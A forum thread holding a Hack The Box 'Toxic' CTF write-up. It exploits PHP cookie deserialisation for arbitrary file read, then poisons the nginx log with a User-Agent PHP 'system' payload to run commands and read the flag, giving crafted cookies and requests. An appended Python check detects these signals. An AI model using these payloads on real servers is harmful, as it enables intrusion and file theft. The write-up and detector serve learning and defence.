TUTORIAL Hackthebox Toxic web challenge writeup
by NopSled - May 05, 2021 at 02:36 AM
#1
This is a quick writeup for the Toxic challenge.

Upon inspecting the challenge's files, specifically index.php and PageModel.php, we find that our PHPSESSID cookie is deserialised and the file to load on the screen is fetched from the deserialised object.

We convert our cookie from base64 to ASCII and we end up with the object:

Quote:
┌──(kali㉿kali)-[~]
└─$ echo 'Tzo5OiJQYWdlTW9kZWwiOjE6e3M6NDoiZmlsZSI7czoxNToiL3d3dy9pbmRleC5odG1sIjt9' | base64 -d

O:9:"PageModel":1:{s:4:"file";s:15:"/www/index.html";}


We modify the object and we can read files from the server, but we can't read the flag file because we don't know its name. So we try to poison the server logs.

Quote:
echo 'O:9:"PageModel":1:{s:4:"file";s:25:"/var/log/nginx/access.log";}' | base64
Tzo5OiJQYWdlTW9kZWwiOjE6e3M6NDoiZmlsZSI7czoyNToiL3Zhci9sb2cvbmdpbngvYWNjZXNz
LmxvZyI7fQo=


We send this new cookie to the server and we can read the log file.

Quote:
GET / HTTP/1.1
Host: 127.0.0.1:1337
User-Agent: <?php system('ls /');?>
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: PHPSESSID=Tzo5OiJQYWdlTW9kZWwiOjE6e3M6NDoiZmlsZSI7czoyNToiL3Zhci9sb2cvbmdpbngvYWNjZXNzLmxvZyI7fQo=
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0


We send this request to poison the nginx log, and when we display the log file again we get a directory listing.

Quote:
dev
entrypoint.sh
etc
flag_ySUHQ
home
lib
media
mnt
opt
proc
root
run
sbin
srv
sys
tmp
usr
var


We construct a cookie to read the flag file, we send it to the server and voila! We get the flag.

Quote:
echo 'O:9:"PageModel":1:{s:4:"file";s:11:"/flag_ySUHQ";}' | base64

Tzo5OiJQYWdlTW9kZWwiOjE6e3M6NDoiZmlsZSI7czoxMToiL2ZsYWdfeVNVSFEiO30K
Reply
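
A defender-side check for the two signals in the writeup above, as an added example that is not part of the original post: it validates a PHPSESSID value against the one object shape and directory the page loader should accept, and flags PHP tags in the User-Agent header. The `/www` web root, the function names and the request dictionaries are assumptions; the cookie values are the ones quoted in the post.

```python
import base64
import binascii
import posixpath
import re

WEB_ROOT = "/www"  # assumption: the only directory the page loader should read
# Narrow matcher for the single object shape in the post, not a general PHP parser.
OBJ_RE = re.compile(rb'^O:9:"PageModel":1:\{s:4:"file";s:(\d+):"(.*)";\}\s*$', re.S)
PHP_TAG_RE = re.compile(r"<\?(php|=)", re.I)

# Constructed sample requests; cookies and the second User-Agent are from the post.
SAMPLES = [
    {"cookie": "Tzo5OiJQYWdlTW9kZWwiOjE6e3M6NDoiZmlsZSI7czoxNToiL3d3dy9pbmRleC5odG1sIjt9",
     "user_agent": "Mozilla/5.0"},
    {"cookie": "Tzo5OiJQYWdlTW9kZWwiOjE6e3M6NDoiZmlsZSI7czoyNToiL3Zhci9sb2cvbmdpbngvYWNjZXNzLmxvZyI7fQo=",
     "user_agent": "<?php system('ls /');?>"},
]

def check_cookie(value):
    """Return 'ok' or the reason a PHPSESSID value should be rejected."""
    try:
        raw = base64.b64decode(value, validate=True)
    except (binascii.Error, ValueError):
        return "not-base64"
    m = OBJ_RE.match(raw)
    if m is None:
        return "unexpected-object"
    declared, path = int(m.group(1)), m.group(2)
    if declared != len(path):
        return "length-mismatch"
    # Resolve ../ segments before comparing against the web root.
    resolved = posixpath.normpath(path.decode("utf-8", "replace"))
    if resolved != WEB_ROOT and not resolved.startswith(WEB_ROOT + "/"):
        return "path-outside-webroot"
    return "ok"

def triage(request):
    """List findings for one request given as {'cookie': ..., 'user_agent': ...}."""
    findings = []
    verdict = check_cookie(request["cookie"])
    if verdict != "ok":
        findings.append("cookie:" + verdict)
    if PHP_TAG_RE.search(request["user_agent"]):
        findings.append("user-agent:php-tag")
    return findings

if __name__ == "__main__":
    for sample in SAMPLES:
        print(triage(sample))
```

The check only reports; the underlying fix is for the application to stop deserialising client-supplied cookies and to stop loading files from a client-controlled path.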
#2
Damn what the fuck is this shit
Reply
#3
thanks for sharing this writeup
Reply
